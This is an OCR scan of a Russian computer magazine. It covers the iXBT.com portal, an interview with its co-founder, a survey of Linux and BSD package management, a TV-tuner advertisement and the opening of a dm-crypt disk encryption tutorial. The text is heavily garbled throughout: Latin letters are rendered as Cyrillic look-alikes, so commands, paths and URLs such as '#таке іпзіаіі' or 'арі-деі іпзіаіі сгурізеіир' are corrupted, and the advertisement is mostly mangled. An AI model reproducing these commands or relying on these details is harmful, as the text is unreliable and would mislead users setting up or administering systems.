занятых в ИТ-бизнесе. Изучает текущее 
состояние рынка и особенности выбора 
тех или иных продуктов, 
ѵѵѵѵѵѵ. сІідіЫіІе. сот — англоязычный ана- 
лог іхЫ.сот, только с меньшим объемом 
инфы. 

гасІагзупс.іхЫ.сот — сервис, с помощью 
которого можно найти и скачать опти- 
мально подходящие для твоего железа 
драйвера. 

ВідИІМагк.огд — сайт, посвященный тес- 
тирующим утилитам (бенчмаркингам). 
Для оверклокеров — то, что нужно. 
бідііаІИоте.іхЬГсопп — самый интерес- 
ный, на мой взгляд, сайт о цифровом доме 




Форум портала — действительно 
уникальное место. Все-таки не 
каждый день сталкиваешься 
с конференцией, в которой 
участвуют 40 тысяч человек. Я 
насчитал здесь около пятидесяти 
тематических разделов, начиная 
«Процессорами» и заканчивая 
«Автофорумом». Тебя наверняка 
особенно заинтересует «Рынок 
труда», где можно задать 
любой вопрос относительно 
образования и карьеры ПГ- 
спеииалиста или просто найти 
высокооплачиваемую работу. 
Общаются на форуме, как 
правило, профессиональные 
компьютерщики, работающие в 
ІТ-индѵстрии, поэтому большая 
часть инфы заслуживает 
внимания. К тому же контент 
тщательно модерируется. 



течение месяца. В том же 2002-м зарабо- 
тала версия сайта для владельцев КПК, и 
поклонники мини-компьютеров получили 
возможность читать его в метро или на 
лекциях. 

Сегодня ІХВТ часто выступает информа- 
ционным спонсором различных компью- 
терных выставок, например ЮР. Сайт 
неоднократно становился победителем 
конкурса РОТОР (эдакого рунетовского 
«Оскара») в номинации «хард’н’софт пор- 
тал года». 

В этом году открылся магазин лицензи- 
онного ПО зИор.іхЫ.сот, который создан 
при поддержке интернет-супермаркета 
ЗоЙКеу.ш. В каталоге представлено по- 
рядка 10000 наименований различных 
программ. Конечно, Горбушке магазин 
конкуренцию не составит, а вот другим он- 
лайновым шопам — вполне. 

Но одним из самых необычных проектов 
ІХВТ стал сервис Росісазі, благодаря ко- 
торому стало возможным не только читать 
информацию с ресурса, но и прослуши- 
вать ее в формате трЗ. Можно скачать 
файлы и слушать на плеере, а можно вы- 
делить новости и запустить их озвучку в 
фоне, занимаясь другим делом. 

Недавно открылся новый раздел — ѵѵѵѵѵѵ. 
іхЬГсот/ргоаисІіо, где освещаются при- 
нципы работы со звуком и звуковым обо- 
рудованием: технологии, программы, тай- 
ны и фишки звукорежиссеров. Говорить 
о сегодняшнем іхЫсот можно долго. Это 
уже не просто сайт, а океан информации, 
где каждый найдет для себя что-то инте- 
ресное. 
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^Интервью с Павлом Соколовым ® 



Вряд ли кто-то сможет рассказать о сетевом проекте лучше, чем 
его автор. Поэтому я связался с одним из основателей іхЬі.сот и 
действующим руководителем проектов ІХВТ Павлом Соколовым, 
согласившимся ответить на мои вопросы. 

Илья Александров: Скажите, какую цель вы имели при созда- 
нии іхЫ.сот . изменилась ли она за прошедшее время? 

Павел Соколов: Сайт іХВТ.сот создан и развивается с одной 
стратегической целью: предоставить читателям возможность 
получить как можно более полную, объективную и полезную ин- 
формацию© высоких технологиях, персональных компьютерах, их 
компонентах и периферийных устройствах. Безусловно, в статьях 
присутствует наше субъективное мнение, но главным фактором, 
влияющим на наше мнение, являются интересы наших читателей. 
Мы видим нашу миссию в формировании цивилизованного рынка 
высоких технологий и компьютеров в России, хотим, чтобы наши 
читатели имели возможность выбирать и покупать только качест- 
венные продукты. Мы также хотим, чтобы предприниматели имели 
возможность заказывать, внедрять и продавать только качествен- 
ную технику и технологии. 

И. А.: Можете выделить особые вехи в развитии проекта? 

П. С.: Каждый год несет что-то новое, и каждый раз мы стараемся 
создать что-то интересное и полезное. Важной вехой стал выпуск 
бумажного журнала в 2002-м, несколько новых сервисов появятся 
в этом. Часть из них уже работают, например росісазііпд. 

И. А.: Расскажите о вашем форуме. 

П. С.: Конференция іо гит .іхЫ.сот — это крупнейшее в мире мес- 
то общения ИТ-специалистов и просто компьютерщиков-энтузиас- 
тов. Используемый движок — наша собственная разработка, и он 
уникален. Реальных участников форума более 40-ка тысяч. Если 
зарегистированный аккаунт не подает признаков активности в те- 
чение 30-ти дней, то он автоматически удаляется сервером. Каж- 
дые пять минут конференцию посещают до 1 500 человек. Сейчас у 
нас 95 тематических форумов, в которых создано более 270 тысяч 
тем и оставлено почти 9 миллионов сообщений. 

И. А.: Не могу не спросить, ІХВТ.сот ломали? Или хотя бы попытки 
ООоЗ'абыли? 

П. С.: Успешных попыток не было. 

И. А.: Под каким ПО работает сервер, где размещен ІХВТ.сот . 
если это не секрет, конечно? 

П. С.: Не секрет. Наши серверы стоят в дата-центре Зіаск.пеі, ос- 
новное ПО — это РгееВЗО + АрасНе + МуЗОІ_. 

И. А.: Расскажите о вашем печатном журнале. О чем он, когда и 
зачем был создан? 

П. С.: Бумажный журнал ІХВТ.сот существует с 2002-го года, в ап- 
реле вышел пилотный номер, аужессентября начались регулярные 
выпуски. Наш журнал является прекрасным справочником и ис- 




точником квалифицированной информации, которая востребова- 
на в течение длительного времени. Основу журнала составляют 
статьи сайта ІХВТ.сот . но есть и уникальные материалы, которых 
нет в электронном виде. Кроме того, в комплекте с журналом пос- 
тавляется ОѴО-диск, на котором, кроме традиционного набора из 
статей (более 200 штук), программ и драйверов, можно найти демо- 
версии новых игр и трейлеры к новым фильмам. 

И. А.: Как появилась идея проекта ОідііаІ Ноте? Насколько перс- 
пективными вы считаете идеи «умного дома»? 

П. С.: «Умный дом» и «цифровой дом» — это не одно и то же. Мы 
развиваем сайт Иіір://біаііаІИоте.іхЬі.сот , который ориентирован 
именно на «цифровой дом», то есть в центре такого дома есть ком- 
пьютер. Тема, безусловно, перспективная, так как большинство 
людей хотят пользоваться благами высоких технологий, но далеко 
не все готовы тратить время на изучение того, как все это устрое- 
но. Наша задача — рассказать о том, как правильно пользоваться 
устройствами «цифрового дома», и насколько удобны те или иные 
решения. Сайт рассчитан на широкую аудиторию. 

И. А.: Как вы находите авторов для статей? И пишете ли сами? 

П. С.: Ищем таланты и иногда находим. Процесс кропотливый и 
требует много времени. Сам я пишу крайне редко. В архивах сайта 
можно найти некоторые мои статьи. 
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И. А.: ЗНор.іХВТ.сот — ваш интернет-магазин лицензионного 
ПО. Как вы думаете, может ли лицензия вытеснить пиратскую про- 
дукцию? Есть ли улучшения в этой области? 

П. С.: Совсем искоренить пиратство, наверное, невозможно. Есть 
масса факторов, влияющих на уровень пиратства: уровень дохо- 
дов пользователей, уровень цен на ПО, его качество, поддержка. 
Тем не менее, если кто-то использует утилиту — значит, она ему 
нужна. Почему бы не оплатить труд разработчиков, если цена ус- 
траивает? 

И. А.: Расскажите об англоязычных проектах. С какой целью они 
создавались? 

П. С.: Если речь идет о сайте ѵѵѵѵѵѵ.сІіаіМіІе.сот . то цель, как и у 
іхЫ.сот — предоставить объективную информацию читателям. 
По сути, это уменьшенная версия іхЫ.сот, так как там публикует- 
ся примерно четвертая часть контента русскоязычного портала. 
Еще мы поддерживаем проект гіаЫтагк.ога . где размещаются 
тестовые пакеты и другие полезные утилиты. 

И. А.: Откуда вы получаете новости для портала? 

П. С.: Непосредственно от компаний, создающих новые техноло- 
гии и продукты, или со специализированных новостных сайтов. 
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И. А.: А с плагиатом не сталкиваетесь? Ваши новости и статьи не 
воруют? Как с этим боретесь? 

П. С.: Сталкиваемся постоянно, боремся легальными методами. 
И. А.: Кто сейчас поддерживает дизайн и внешний облик про- 
екта? 

П. С.: У нас своя студия дизайна и свои веб-программисты. 

И. А.: Напоследок расскажите, какие события из жизни ІХВТ. 
сот вам запомнились особенно? 

П. С.: Каждый день уникален, трудно что-то выделить особо. 
Могу рассказать пару забавных историй. Коллективу нас очень 
веселый и дружный, каждый день случается что-то смешное. 
Шесть лет назад у нас работал редактором раздела материн- 
ских плат нынешний президент Рохсопп в России Александр 
Трухачев. Когда нам привезли новый холодильник, Саша вы- 
нул его из коробки, проделал в ней отверстия для рук и для глаз 
и залез внутрь. Получилась смешная говорящая коробка :). 
Также вспоминается Дмитрий Майоров (работает в ЫѴЮІА+), 
бегающий по всему НИИ после ожесточенного матча в Оиаке III 
за другим нашим сотрудником, угрожая напольным вентилято- 
ром. Так он был расстроен своим поражением в ОЗ :). 
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ПАКЕТНОГО 
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СИСТЕМА УПРАВЛЕНИЯ ПАКЕТАМИ НАРЯДУ С ПРИНЦИПОМ ОРГАНИЗАЦИИ 
ИНИЦИАЛИЗАЦИОННЫХ СКРИПТОВ ЯВЛЯЕТСЯ ОТЛИЧИТЕЛЬНОЙ ЧЕРТОЙ 
ЛЮБОГО СОВРЕМЕННОГО ДИСТРИБУТИВА ШЦХ. И С ЭТИМ НЕЛЬЗЯ НЕ СО- 
ГЛАСИТЬСЯ. ИМЕННО НАБОР ПРОГРАММНОГО ОБЕСПЕЧЕНИЯ СЕГОДНЯ 
ПРИНЯТО НАЗЫВАТЬ ДИСТРИБУТИВОМ ШЦХ. ОДНАКО СУЩЕСТВУЕТ МНО- 
ЖЕСТВОРАЗНОВИДНОСТЕЙСИСТЕМУПРАВЛЕНИЯПАКЕТАМИ, РАЗОБРАТЬ- 
СЯ В КОТОРЫХ НЕПОДГОТОВЛЕННОМУ ЧЕЛОВЕКУ БЫВАЕТ СЛОЖНО. 



НАЧАЛО УПАКОВКИ 

Во времена, когда Пингвин был еще мла- 
денцем, не существовало ни пакетов, ни 
дистрибутивов. Энтузиасты, решившие 
опробовать І_іпих, выкачивали из Сети ядро 
и весь необходимый для загрузки и работы 
операционной системы софт, а затем про- 
сиживали долгие часы перед монитором, 
собирая все это в единое целое, чтобы 
получить нечто отдаленно напоминающее 
современный І_Р8. Очевидно, что такой 
подход к установке І_іпих устраивал разве 
что фанатичных технарей, получавших 
истинное удовольствие от непристойных 
сношений с ОС. Для остальных же двери 
в волшебный мир І_іпих были закрыты на 
огромный навесной замок финского про- 
изводства. 

Первыми героями, отважившимися пока- 
зать Пингвина широким слоям населения, 
стали Питер МакДональд и Патрик Воль- 
кердинг. Прото, как МакДональд в 92-м году 
создал первый в истории дистрибутив Ыпих, 
можно рассказывать долго, но эта тема нас 
сейчас не интересует. Наибольший инте- 
рес вызывает творение небезызвестного 
Патрика под названием ЗІаскѵѵаге І_іпих. 
Именно Патрик привнес в мир Ыпих идею 
пакетного менеджмента и реализовал ее в 
виде специальных утилит для своего дист- 
рибутива. Сам пакет представлял собой 
обычный тарболл, который посредством 
утилиты /зЬіп/іпзіаІІркд устанавливался в 
файловую систему. Обратную процедуру 
выполняла команда /зЬіп/гетоѵеркд, кото- 
рая просматривала базу /ѵаг/Іод/раскадез/ 



и удаляла пакет из системы. С тех времен 
система пакетного менеджмента дистри- 
бутива ЗІаскѵѵаге не претерпела карди- 
нальных изменений (как, впрочем, и все ос- 
тальное), разве что неотъемлемой частью 
каждого пакета стал ифайлыіпзІаІІ/сІоіпзЬзГі 
(выполнение скрипта после установки па- 
кета) и іпзіаіі/зіаск-безс (краткое описание 
пакета), а базовая комплектация дистри- 
бутива пополнилась еще несколькими по- 
лезными утилитами, например /зЬіп/ркдІооІ 
(псевдографический фронтенд к іпзіаііркд 
и гетоѵеркд). 
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Создаем пакет, используя 
сйескіпзіаіі 



КРАСНАЯ ШАПОЧКА 
ПРОТИВ ВСЕХ 

Неприлично простой ЗІаскѵѵаге и его подход 
к управлению пакетами до сих пор привле- 
кает опытных пользователей, способных 
самостоятельно решить проблемы зави- 
симостей и конфликтов между пакетами. 
Но что делать всем остальным, далеким от 
Ыпих людям? Этим же вопросом задалось 
руководство одной из первых коммерчес- 
ких Ьіпих-компаний Неб НаГ Подходящих 
решений для «умного» управления паке- 
тами в то время не существовало, и про- 
граммисты Неб Наі создали собственный 
формат пакетов — Неб Наі Раскаде Мападег 
или просто НРМ (сегодня эта аббревиатура 
приняла вид рекурсивного акронима — НРМ 
Раскаде Мападег). Другой популярный се- 
годня формат пакетов был предложен Яном 
Мардоком, создателем народного дистри- 
бутива ЭеЫап. Сегодня пакеты ЭеЫап пре- 
вратились в некий антипод НРМ, а с выхо- 
дом ІІЬипіи Ыпих его позиции еще больше 
укрепились. 

Оба формата имеют сходные черты: РОР- 
сигнатуры для идентификации создателя 
пакета, контрольные суммы всех файлов 
пакета, отслеживание зависимостей и 
конфликтов, понятие виртуальных паке- 
тов. Различия становятся очевидны, если 
смотреть на пакет с точки зрения человека 
его создающего. Пакеты НРМ имеют очень 
запутанный, неоднозначный, сложно рас- 
ширяемый формат, не совместимый с пре- 
дыдущими версиями (современный НРМ — 
это уже четвертая реинкарнация). С другой 
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стороны, пакеты ЭеЫап — 
это архивы, созданные ути- 
литой /изг/Ьіп/аг (архиватор 
обычно используется для 
упаковки объектных файлов 
в статическую библиотеку), 
содержащие два тарболла, 
в одном из которых находится 
ірограмма (то есть файлы, ко- 
торые должны быть установлены 
в дерево файловой системы), а 
в другом — метаданные (описа- 
ние пакета, зависимостей и тому 
подобное). При этом внутренняя 
структура пакетов ОеЬіап может 
быть легко расширена и адапти- 
рована к новым условиям. 
Утилиты /изг/зЬіп/грт и /изг/зЬіп/ 
фкд, являющиеся стандарт- 
ными средствами манипули- 
рования пакетами в Неб Наі и 
ОеЬіап, на самом деле особым 
«интеллектом» не обладают. Их 
основные задачи — установ- 
ка, удаление и извлечение 
метаданных из пакета. Поль- 
зователю же предлагается ис- 
пользовать более высокоуровневые 
средства, такие как арі-деі (ОеЬіап), уигті (Ресіога 
Соге), ир2ба1е (Неб Наі) или игрті (Мапбгіѵа). Все 
программы служат одной единственной цели — 
автоматизировать процесс установки и обновле- 
ния пакетов (выкачивание пакета и зависимостей 
из сети, обновление отдельных пакетов и всего 
дистрибутива). 




краскаде — ксіе-фронтенд к системе 
пакетного менеджмента 



пакетов информации о нем не будет. Создать 
пакет самостоятельно? Да, наиболее правиль- 
ный путь, но и наиболее сложный и затратный 
в плане свободного времени. Что же делать? 
Использовать специальные утилиты, автома- 
тизирующие процесс сборки пакета. 
СЬескіпзІаІІ ( сЬескіпзІаІІ.ІгІо.ога ) — одна из та- 
ких утилит. СНескіпзІаІІ запускается на этапе 
установки уже собранной программы (как раз 
тогда, когда следует использовать таке іпзіаіі), 
перехватывает библиотечные вызовы, исполь- 
зуемые для копирования файлов, и составляет 
списокустанавливаемых файлов. Затем наос- 
нове этой информации создает пакет (ідг, грт 
или беЬ) и прописывает его в базу. Установка 
программы из исходников с использованием 
сНескіпзІаІІ выглядит так: 

# ./сопіідиге 
#таке 

# сЬескіпзІаІІ 

Иной подход исповедуют создатели програм- 
мы 01416 Зіоѵѵ ( ѵѵѵѵѵѵ.апи.ога/зоЙѵѵаге/зІоѵѵЛ . 
Зіоѵѵ не создает нэйтивного пакета для дист- 
рибутива, не использует собственную базу 
пакетов. Эта утилита предоставляет возмож- 
ность пользователю установить программу в 
индивидуальный каталог (как это происходит 
вѴѴіпбоѵѵз и МасОЗ). «Расфасовка» программ 
по изолированным каталогам противоречит 
идеологии ЫМХ, но может быть использована 
благодаря символическим ссылкам. К плюсам 
такого подхода можно отнести частичное ре- 
шение проблемы конфликтов между пакетами 
и визуальной стороной. Рассмотрим пример 
установки программы с использованием Зіоѵѵ: 

# ./сопіідиге 
#таке 

# таке іпзіаіі ргеІіх=/изг/ІосаІ/зІоѵѵ/ргодгат 

# зіоѵѵ ргодгат 

Последняя команда создаст все необходимые 
ссылки в дереве /изг/іосаі. Для удаления про- 
граммы достаточно выполнить две команды: 
«зіоѵѵ -Э ргодгат» (удаление ссылок) и «тп -НІ 
/изг/іосаі/зіоѵѵ/ргодгат» (удаление самой про- 
граммы). 

Существует еще множество других «правиль- 
ных» способов установки программ из исход- 
ников, с самыми интересными из которых ты 
можешь ознакомиться на сайте проекта І_Р5 
( ѵѵѵѵѵѵ.ІіпихІготзсгаІсІтога У 



КРУЖОК «УМЕЛЫЕ РУЧКИ» 

В базе пакетов большинства популярных дис- 
трибутивов І_іпих насчитывается несколько 
тысяч программ, что вполне устраивает 99% 
пользователей. Но часто возникает потреб- 
ность как раз в той программе, которая отсутс- 
твует в поставке дистрибутива. Может быть, 
пакет и есть, но хочется опробовать вкусности 
новой версии, выпущенной пять часов назад. 
Что делать в этом случае? Самый простой путь — 
скачать исходники и собрать программу само- 
стоятельно, но тогда мы столкнемся с пробле- 
мой удаления пакета в будущем, так как в базе 



ПАКЕТ С ПОКУПКАМИ 

Вместо того чтобы помещать распространяе- 
мое ПО в индивидуальные для каждого дистри- 
бутива пакеты, производители коммерческого 
и закрытого ПО решили использовать нечто 
вроде самораспаковывающихся архивов. Ко- 
нечно, ни о каком отслеживании зависимостей 
и регистрации пакета в базе не может идти 
речи, но зато выполняется основная задача 
любой компании, промышляющей в области ІТ. 
В большинстве случаев этот самораспако- 
вывающийся архив имеет расширение .гип и 
представляет собой шелл-скрипт, в конец ко- 



торого дописан архив с программой. При за- 
пуске скрипт задает пользователю несколько 
вопросов, вычисляет точку, в которой закан- 




Команда ркдіпІЪ в ОгадопРІуВЗР 



чивается текст и начинается архив, извлекает 
архив во временный файл и распаковываетего 
в каталог, указанный пользователем. После 
отработки все созданные файлы отправляют- 
ся в /сіеѵ/пиіі, а пользователь думает, что про- 
изошло нечто магическое. ОрепОНісе, Орега, 
драйвера пѴібіа и многие коммерческие игры 




Устанавливаем диаке4 



распространяются в подобных самораспако- 
вывающихся архивах. 

Схожий подход используется в пакетах фор- 
мата АиІоРаскаде ( ѵѵѵѵѵѵ.аиІораскаае.ога У По- 
мимо шелл-скрипта и архива с программой, в 
таком пакете находится удобный графический 
инсталлятор, способный отслеживать зави- 
симости, и менеджер пакетов, который уста- 
навливается в систему вместе с программой и 
прописывается в меню КБЕ и Споте. Процесс 
установки и удаления пакетов АиІоРаскаде 
у неподготовленного человека не вызывает 
никаких трудностей. Большинство проблем 
решается автоматически, в крайнем случае 
выводится справка об ошибке и путях ее ре- 
шения. Внешне все это очень напоминает ус- 
тановку программы в ОС ѴѴіпсІоѵѵз. 

К ЧЕРТУ ПАКЕТЫ 

В отличие от І_іпих ситуация в узком круге 
ВЗО-систем менее увлекательна. Здесь нет 
огромного количества вариантов упаковки 
ПО, разницы в подходах к его распространению 
и навязчивого мнения разработчиков дистри- 
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бугива. Любая ОС семейства ВЗй • предлагает 
два средства установки софта: порты и пакеты. 
Причем во всех ВЗО-отпрысках эти самые средс- 
тва реализованы схожим образом (а в ІХеІВЗО и 
ОгадопРІуВЗО вообще повторяют друг друга). 
Возьмем, к примеру, порты. Порты (рогіз) — 
это некий фреймворк, призванный автома- 
тизировать сборку программ из исходников. 
Организация портов во всех ВЗО-системах 
одинакова и основывается на одних и тех 
же принципах: рассортированное по классу 
программ дерево, набор таке-файлов для 
выкачивания, распаковки, отслеживания 
зависимостей и сборки программ. Так что 
различается только реализация. Проде- 
монстрирую это на примере. Чтобы собрать 
и установить ѵіт в ІХеІВЗО, необходимо вы- 
полнить две команды: 

# сб /изг/ркдзгс/есіііогз/ѵіт 
#таке іпзіаіі сіеап 

То же самое во ЕгееВЗО: 

# сб /изг/рогіз/есіііогз/ѵіт 

# таке іпзіаіі сіеап 

Как видно, для пользователя различия чисто 
визуальные. Стоит сказать, что системы пор- 
тов ІМеІВЗО и ЕгееВЗй поддерживаются совер- 
шенно независимыми командами, но родство 
заметить нетрудно. 

Принципиальной разницы нет и в реализации 
пакетных менеджеров. В любой ВЗй можно 
найти привычные команды /изг/зЬіп/ркд_абб, 
/изг/зЬіп/ркд_сІеІе{е и /изг/зЬіп/ркд_іпТо, пред- 
назначенные, соответственно, для установки, 
удаления и извлечения информации из па- 
кетов. Во время инсталляции пакета ркд_абб 
проверяет, все ли требуемые зависимости 
установлены (и если нужно, устанавливает их), 
распаковывает пакет в дерево файловой сис- 
темы (/изг/іосаі в ЕгееВЗй) и прописывает ин- 
формацию о пакете в базу /ѵаг/бЬ/ркд/. Пакеты 
ЕгееВЗй, ЫеШЗй и ОрепВЗй — это обычные 
тарболлы, сжатые дгір (в этом случае расши- 
рение 7дг) или Ьгір2 (.ТЬг), но различные по 
содержанию. В любом случае, в корне такого 
тарболла находится несколько файлов, имена 
которых записаны в верхнем регистре, а в ка- 
честве первого символа выступает знак « + » . В 
таких файлах содержится различная инфор- 
мация о пакете, его содержании и зависимос- 
тях (например, +СОММЕЫТ — краткая инфор- 
мация о программе, +СОМТЕМТ5 — список 
устанавливаемых файлов, +ІІХЗТАЕЕ — пос- 
тинсталляционный скрипт). 

Недавно поклонники ВЗй создали так называ- 
емую «настольную ВЗО». Мы стали очевидца- 
ми появления на свет сразу двух представите- 
лей этого семейства: ОезкІорВЗО ( безкіорбзб. 
пеі) и РС-ВЗО ( ѵѵѵѵѵѵ.рсЬзб.ога Ѵ Особое место 
в этих дистрибутивах ЕгееВЗО занимает, ко- 
нечно же, дружелюбная пользователю сис- 
тема пакетного менеджмента. В ОезкІорВЗО 
дружелюбной стала система портов — со- 
бирать программы из исходников теперь 
можно, используя удобный графический 
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интерфейс. В РС-ВЗО, напротив, использует- 
ся собственный формат пакетов. Управляет 
пакетами система РВІ, которую идейно можно 
представить как симбиоз рассмотренных ра- 
нее ОІЧІІ Зіоѵѵ и АіЛоРаскаде. Пакеты устанав- 
ливаются при помощи графического инстал- 
лятора и размещаются в /изг/ІосаІ/МуРгодгатз 
(каждый в индивидуальном каталоге). 

Г ибкости и мощи системы портов не могли не за- 
метить представители сообщества пользовате- 
лей Еіпих. Дэниель Роббинс ухитрился сплавить 
воедино технологические наработки сообщест- 
ва Еіпих с философией мира ВЗО и получил в ре- 
зультате (Зепіоо — самый ВЗО’шный дистрибутив 
Еіпих. В (ЗепЕэо отразились не только идейные 
стороны ВЗО-систем (сквозная простота, ста- 
бильность), но и технические, например система 
портов, получившая имя роііаде. Причем разра- 
ботчики (Зепіоо пошли дальше своих коллег из 
лагеря ВЗО и еще более усовершенствовали и 
без того красивый подход к установке ПО. Са- 
мыми яркими отличиями стали команда /изг/зЬіп/ 
етегде и так называемые «флаги ЕІЗЕ». Скрипт 
етегде, написанный на руТГюп, применяется 
для управления пакетами и аккумулирует в себе 
все необходимые функции менеджера пакетов, 
то есть позволяет устанавливать и удалять пор- 
ты, проводить аудит дерева портов. Используя 
етегде, можнослегкостьюустанавливать бинар- 
ные пакеты. В этом случае он действует на манер 
команды арЕде! из ОеЫап. То, что в Сепіоо обоз- 
начается загадочным термином «флаги ЕІЗЕ», на 
самом деле представляет собой довольно инте- 
ресный способ передать команде етегде сведе- 
ния о том, какие зависимости должны быть вклю- 
чены в компилируемую программу, а какие — нет. 
Например, чтобы собрать тріауег, отключив под- 
держку X ѴѴіпбоѵѵ, но, оставив возможность про- 
смотра видео в консоли, необходимо добавить в 
файл /еІс/таке.сопТ строку «Е13Е=’-Х +ТЬсоп’» и 
выполнить команду “етегде тріауег». Для вре- 
менного включения/отключеі-(ия флагов можно 
использовать вот такой прием: 

# Е13Е=’-Х -ИЬсоп’ етегде тріауег з: 
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ШЗюШЙЗ хзоо 

Смотрите тепе програ ммы безупрг^нпго ламеп ва нл 

Вашем ПК 

* Смотрите, спушЕійі о и записывайте 
телвпрофаммы и радиостанции на Вашем 
компьютере 

* Функции 20+30 профессионального разделения 
сиі налов яркости и цёйі нести с 
шумопцдевлвнивм В системах 

■ Звлнсь выбранного квннлэ по расписанию с 
іхпочвнімі компьютера 

* Пупы ДѴ С функцией включен ин/йыкпюча нин 
Вашего компьютера 

■ Поддерга эалнси в формтах МРЕС Ѵ2^4 и 
функций Бігаід^іМо-бісс для нолосрслстванной 
записи на ѵюеоСо или Вѵй 

I Упучціеннэр Функц^ РІР/РОР ДЛР 
одновремениото проаштра программы и 
просмотра видеофайла 

■ Возможность воспроизведения телепрограммы 
прямо не Рйбсмем стопе 

* Раздельные настройки изображении длр кандао 

канала и нас тройка списка каналов 




МіЬойШЭэ Н900 

Уйипрсшіьиуй аналоговый ТѴ/^М-т*онер с 

аппаратным код+цюванием МРЕС2 

* Новый однокриотельный МРЕ-3-? кодер Сопехапі 
СХ23№ с интегрированным блоком 

д о н.лдирс ванного аналогового тепеващания, 
поддержкой трехмерного разделения каналов 
яркости и цветности в МТ5С и 
стереофонического телевещания. 

* Дистанционной вюткченн&Гныюійчениег - как у 
телевизора и гм видеомагнитофона 

* Запись с включением компьютера по тдймеру - 
Вы никогда не пропустите интересную перодачу 

- Инфракрасный пульт дистанционною 
улреѳпенин - управляйте просмотрим н здписью, 
ТВ-программ. РМ-приемником и ОѴО^плеером. 

* Раздольные настройки яркости, контраста, 
насыщенности, Огтенка и четкости для каждою 
канале 

* Поддерживает аппаратное кодирование МРЕС- 
1/2 и программной кодирование в МРЁ124 




М#эс№0э Асііоп ІНіга 




■ Просмотр ТВ-проірамм на инстопьнвм 

компьютере или ноутбуке 

* Видсоэахвэт и просмотр 

изображении в МРЕСі і,'2іЧ 

* Поддермка высонк^оростирг о 

интерфейса 1 *БВ 2 О 

* Компактный и 
Порта ГиВный дизайн 

■ Питание от порта иВВ 2,0 

■ Пулы ДУ„ выполненный 
о иарточнем дизайне 
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ішиясні нкиих плинту 
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ТІІІ_КВЕЦЬ#6 

Шифрование дисков с помощью Рт-сгурі 

ОСТАВЛЯТЬ ИНФОРМАЦИЮ НЕЗАШИФРОВАННОЙ — ЗНАЧИТ ПОДВЕРГАТЬ 
СВОИ ДАННЫЕ ОПАСНОСТИ. СЕГОДНЯ Я РАССКАЖУ ТЕБЕ, С ПОМОЩЬЮ ЧЕГО, 

КАК И ЗАЧЕМ МОЖНО ШИФРОВАТЬ ДАННЫЕ В ОС І_ІШХ, НАЧИНАЯ ОТ СОЗДА- Г 

НИЯ ЗАШИФРОВАННОГО ДИСКА И ЗАКАНЧИВАЯ ШИФРОВАНИЕМ ВРЕМЕННЫХ _ 
ДАННЫХ. ПОСЛЕ ПРОЧТЕНИЯ ЭТОЙ СТАТЬИ И ПРИМЕНЕНИЯ ПОЛУЧЕННЫХ ЗНА- | 1 
НИЙ НА ПРАКТИКЕТЫ сможешь спать спокойно. Л I 

РЧХ6 Н А 6 ЕСЧ 
Л* О У5РЧМ5 
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Потребность в шифровании данных существовала с давних вре- 
мен. Кто-то пытается оградить свои данные от конкурентов, кто-то 
играет в шпионов, кто-то — просто хакер, обеспокоенный возмож- 
ными последствиями своих действий. В любом случае, у каждого 
человека так или иначе возникает необходимость в сохранении 
своих данных. 

В принципе, есть лишь два вида угрозы: раскрытие и видоизмене- 
ние данных. Раскрытие данных означаетто, что кому-то стал извес- 
тен смысл информации. Последствия могут быть самые разные. 
Например, если похищен текст книги, над которой работали мно- 
гие месяцы, то потери авторов могут составить несколько тысяч 
долларов, а если книга уже издана, то похищение ее текста может 
создать книге дополнительную рекламу. Другое дело — искажен- 
ная информация. Она представляет гораздо большую опасность. 
Например, если данные организации об инвентарных описях или 
списках заказов будут стерты, то работа парализуется надолго. 
Существует несколько способов шифрования в 1_іпих: 
•шифрование отдельных файлов (выполняется с помощью ОпиРО); 
•шифрование дисков (можно выполнить с помощью Опп-сгурі, а 
посредством От-сгурі — создать виртуальный шифрованный диск, 
который будет располагаться в физическом файле на диске). 
Оеѵісе-таррег — новая инфраструктура ядра І_іпих 2.6, которая 
позволяет создавать виртуальные устройства, работающие по- 
верх физических. От-сгурі отличается от Сгуріоіоор более чистым 
кодом и удобством в настройке. Я рассмотрю применение От-Іооіз 
для ОеЬіап и Сепіоо. Для остальных дистрибутивов процедуры на- 
стройки будут аналогичны. 

Установка Рт-сгур! 

Сначала необходимо настроить конфигурацию ядра, запустив гра- 
фическую оболочку для его настройки: 

#ссІ/изг/5гс/Ііпих 
#таке теписопіід 

Необходимые опции ядра: 

1. Подключаем опции, имеющие статус разрабатываемых или 
экспериментальных: Собе таіигііу ІеѵеІ орііопз -> Рготрі Іог 
беѵеіортепі: апб/ог іпсотріеіе собе/бгіѵегз. 

2 . Данная опция необходима для корректной работы с ибеѵ: ОепегаІ 
зеіир -> Зиррогі Іог ЬоІ-рІиддаЫе беѵісез. 

3. Поддержка непосредственно самого Оеѵісе-таррег: Оеѵісе 
Огіѵегз -> МиШ-беѵісе зиррогі (РАЮ апб І_ѴМ) -> Оеѵісе таррег 
зиррогі. 

4 . Поддержка шифрования через Оеѵісе-таррег: Оеѵісе Огіѵегз -> 
МиІІі-беѵісе зиррогі (РАЮ апб І_ѴМ) -> Сгурі Іагдеі зиррогі. 

5 . Поддержка алгоритма шифрования АЕ8: СгурІодгарЬіс орііопз 
-> АЕ8 сірЬег аІдогііЬтз. 

6 . Поддержка алгоритмахэширования ЗНА1 : СгурІодгарЬіс орііопз 
->ЗНА1 бідезІаІдогііЬт. 

7 . Поддержка виртуальных РАМ-дисков: Оеѵісе Огіѵегз -> ВІоск 
беѵісез -> РАМ бізк зиррогі. 

8 . Поддержка так называемого начального РАМ-диска: Оеѵісе 
Огіѵегз -> ВІоск беѵісез -> РАМ бізк зиррогі -> Іпіііаі РАМ бізк (іпіігб) 
зиррогі. 

Теперь компилируем и устанавливаем ядро в/ЬооІ: 




Консоль: саІ/ЬооІ/дгиЬ/дгиЬ.сопІ 

а монолитом. Если ты решишь сделать модульную сборку, 
будь предварительно подгрузить соответствующие моду- 
ли с помощью тобргобе. После перезагрузки необходимо 
установить изег-зрасе утилиты. Для этого воспользуйся 
командой: 

беЬіап# арі-деі іпзіаіі сгурізеіир 
депіоо# етегде беѵісе-таррег сгурізеіир 

После чего удостоверься, что беѵісе таррег запущен: 
/беѵ/таррег/сопігоі 

Проверь также, появился ли сгурі Іагдеі: 




то не за- 



за 

ае 

88 
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# /зЬіп/бтзеІир Іагдеіз 




сгурі 


ѵі.1.0 


зігіреб 


ѵі.0.2 


Ііпеаг 


ѵі.0.1 


еггог 


ѵі.0.1 
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Шифрование гооі-раздела 

Я рассмотрю шифрование корневого раздела только для дист- 
рибутива Сепіоо, в ОеЬіап все происходит схожим образом. Для 
